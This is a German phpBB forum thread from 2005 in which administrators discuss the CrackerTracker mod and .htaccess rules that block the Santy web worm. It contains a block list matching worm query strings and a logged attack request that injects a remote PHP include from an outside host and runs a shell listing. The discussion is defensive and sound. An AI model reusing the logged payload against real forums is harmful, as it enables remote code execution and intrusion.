CBACK CrackerTracker Worm Protector

Neue Projekte und Anfragen, Teamarbeiten und Alpha/Beta Scripte jeder Art.
KEINE Supportanfragen zu bestehenden MODs!
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Nein. Damit würdest Du das Script 2000 Sekunden lang anhalten.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Beitrag von adjustMan »

[quote="cback - Mo 14.Feb, 2005 17:54";p="23303"]Er probiert es lange Zeit[/quote]
ja, und ich habe den Eindruck, es belastet den Server enorm :rolleyes:
cu aM
Max
Beiträge: 628
Registriert: So 23.Jan, 2005 09:54

Beitrag von Max »

naja, der Wurm in seiner fiesen Art belastet den Server enorm, weil er ja immer wieder versucht in eine Lücke einzudringen, die es nicht gibt.

Ich hatte den bisher via .htaccess ausgesperrt, das war auch bis vor ca. zwei Wochen recht brauchbar, aber dann wurde eines der Foren, die ich betreibe über eine seiner URLs massiv attackiert - hat bei allincl. eine Serverlast von 800% erzeugt - dann haben die immerzu versucht, bei mir den Fehler zu suchen. Naja ich habe denen gesagt, sie sollen vorerst die betroffene URL abschalten (war eine C-Domain) und schon war alles besser. Nun habe ich dann aber trotzdem das Tool hier aus dem Thread eingebaut aber es gibt jetzt nichts zu loggen :-)
Das Tool selbst belastet den Server absolut garnicht, wie das bei Wurmattacken aussieht, weiß aich aber nicht, denke aber, dass es weniger LAst ist, als der Wurm erzeugt.


Gruß Max
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

denke aber, dass es weniger LAst ist, als der Wurm erzeugt.

Dafür wurde es speziell entwickelt, bei mir hatte der Wurm bevor ich mich an diesen MOD gesetzt habe am Tag glaub ich 3GB Traffic verbraten wo es sonst so höchstens mal 600MB sind. Und als ich es drin hatte warns abends trotz enormer attacken nur rund 670MB also doch enorme Traffic und leistungseinsparung. Vor allem weil SQL gar nicht mehr belastet wird ;)
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Und in Verbindung mit dem .htaccess-Block ist der Mod unschlagbar und unbezwingbar!
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
adjustMan
Beiträge: 205
Registriert: Sa 18.Sep, 2004 00:03

Beitrag von adjustMan »

[quote="oxpus - Mo 14.Feb, 2005 19:42";p="23313"]Und in Verbindung mit dem .htaccess-Block ist der Mod unschlagbar und unbezwingbar![/quote]
na da wär ich vorsichtig mit solchen Äusserungen. nichts ist unbezwingbar. ;)
cu aM
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Naja, ich bin ja schon ruhig :pfff
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
tom10
Beiträge: 1106
Registriert: Sa 29.Jan, 2005 14:58
Kontaktdaten:

Beitrag von tom10 »

Was genau empfiehlt sich da eigentlich in die .htaccess reinzupacken ?
Meine sieht momentan so aus:

Code: Alles auswählen

DirectoryIndex index.html index.htm portal.php index.php

RewriteEngine On

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
Der Versuch was neues zu versuchen....
http://simson-le.de.vu
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Ja. das ist auch ausreichend. Mehr muss es nicht sein.
Wer will kann noch die Short URL's aufbauen, aber dazu ist auf http://www.phpbb.de ein grosses Topic vorhanden.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
el4efo
Beiträge: 21
Registriert: Di 01.Mär, 2005 12:13
Kontaktdaten:

Beitrag von el4efo »

Kann es sein, dass der crackertracker probleme mit dem Highlight beim Search macht?

Hab nämlich folgendes Problem seit ich Ihn installiert hab:
http://www.oxpus.de/viewtopic.php?p=25153#25153
el4efo
Beiträge: 21
Registriert: Di 01.Mär, 2005 12:13
Kontaktdaten:

Beitrag von el4efo »

[SOLVED]
In Zeile 7 war ein "?>" zuviel.

Das muss wohl mal irgendwann beim modden reingerutscht sein.
Bin mit dem CrackerTracker bisher sehr zufrieden! Sorry für die Umstände.
Zuletzt geändert von el4efo am Di 08.Mär, 2005 14:46, insgesamt 1-mal geändert.
Benutzeravatar
volker58
Beiträge: 724
Registriert: Mo 27.Dez, 2004 19:22
Wohnort: Annaberg-Buchholz
Kontaktdaten:

Beitrag von volker58 »

kann es sein das die würmer meine seite nimmer wollen, habe seit wochen keine logs mehr, er geht aber noch, habe es gerade so getestet

Code: Alles auswählen

viewforum.php?t=20&chr(
Gruss Volker

http://www.fuchsienfreunde.de
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Hihi da hat der CTracker den Wurm wohl "Owned" :D
Benutzeravatar
tom10
Beiträge: 1106
Registriert: Sa 29.Jan, 2005 14:58
Kontaktdaten:

Beitrag von tom10 »

Ja , scheinbar, bei mir ist mittlerweile auch Ruhe!
Der Versuch was neues zu versuchen....
http://simson-le.de.vu
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Kann mal jemand laut sein? Bei mir passiert nichts mehr, seit dem "Doppelschutz" durch den Cracker Tracker und .htaccess-Abwehr.
Und nochmals an dieser Stelle ein dickes Lob an CBack, der mit damals aus der grössten Patsche geholfen hat, in der mein Board stand (Auch wenn es schon x-mal passiert und ewig her ist!).
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

Bei mir passiert nichts mehr, seit dem "Doppelschutz" durch den Cracker Tracker und .htaccess-Abwehr
Bei mir ebenfalls! :)
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
SanTic
Beiträge: 202
Registriert: Di 12.Okt, 2004 15:02
Wohnort: Braunschweig
Kontaktdaten:

Beitrag von SanTic »

Dito! Diese 'Ruhe' ist irgendwie....beunruhigend. ^^
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Sei doch froh! Dann weißt Du, daß
A. Nichts passiert
B: Der Schutzwall hält

BTW: Schau doch mal in Deine Log-Files. Da wirst Du sicherlich Herzschmerzen bekommen, was da alles festgehalten wird ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

eben bemerkt....

Datum IP User Agent Request URI
17.03.2005, 20:17 24.226.36.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0 t=65&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://apostolateforholyrelics.com/conf ... uote]Datum IP User Agent Request URI
17.03.2005, 20:17 24.226.36.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0 t=65&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://apostolateforholyrelics.com/conf ... d=ls%20-al[/quote]

seit wann steht da eine domain dabei... und seit neuerstens Opera 8.0
hatte jetzt gut eine woche ruhe nun wieder cracks...


@oxpus
habe eben 2 bugs entdeckt bei dir...

zum einen hier im post wenn ich zitiere Auswahl mache, kopiert er mein post ein zweites mal mit rein...

und als ich da beim ersten mal gemacht habe und es bei mir markiert war auf meiner seite was ich bei dir einfügen wollte, stürzte deine seite komplett ab und der browser wurde geschlossen.... allerdings denke ich hierbei, das es sich um einen fehler im ie 6.0 handelt... nur zur info...


liebe grüsse
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Der Wurm entwickelt sich weiter bzw. wird weiterentwickelt um verschiedene Sperrsysteme z.B über .htaccess oder andere Schutzsysteme zu umgehen. CrackerTracker is allerdings immer noch ohne Update absolut sicher vor der neuesten Generation des Wurmes die ich bereits angesehen habe. :)
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

zum einen hier im post wenn ich zitiere Auswahl mache, kopiert er mein post ein zweites mal mit rein...
Bei mir nicht. Weder mit Firefox noch mit dem IE.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
AmigaLink
Beiträge: 5843
Registriert: Mi 03.Mär, 2004 09:05
Wohnort: NRW
Kontaktdaten:

Beitrag von AmigaLink »

^^ Bei mir auch nicht.
[center].: Web Relax .::. Essen mit Freude .::. AmigaLink.de :.
______________________________________

Kein Support per PM, ICQ oder eMail!!!
[/center]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Bei mir auch nicht. PS: Auf dem Button keinen Doppelklick ausführen, ein einfach klick reicht da

(was ich wegen nem leichten Linux einschlag sowieso überall mach *g*)
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

seltsam, hatte das gester 2 mal oxpus...
wahrscheinlich IE 6.0 billyboys sorgenkind denke ich wird daran schuld gewesen sein..

grüsse
Benutzeravatar
oxpus
Administrator
Beiträge: 28735
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Ich konnte vor 2 Stunden nicht mehr surfen: Ladezeiten waren extram hoch.
Rechner (mit Windows XP) einmal neu gestartet (nachdem ich mit ein paar Neuwagen angeschaut habe) und es geht wieder.
MS sei dank ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Gesperrt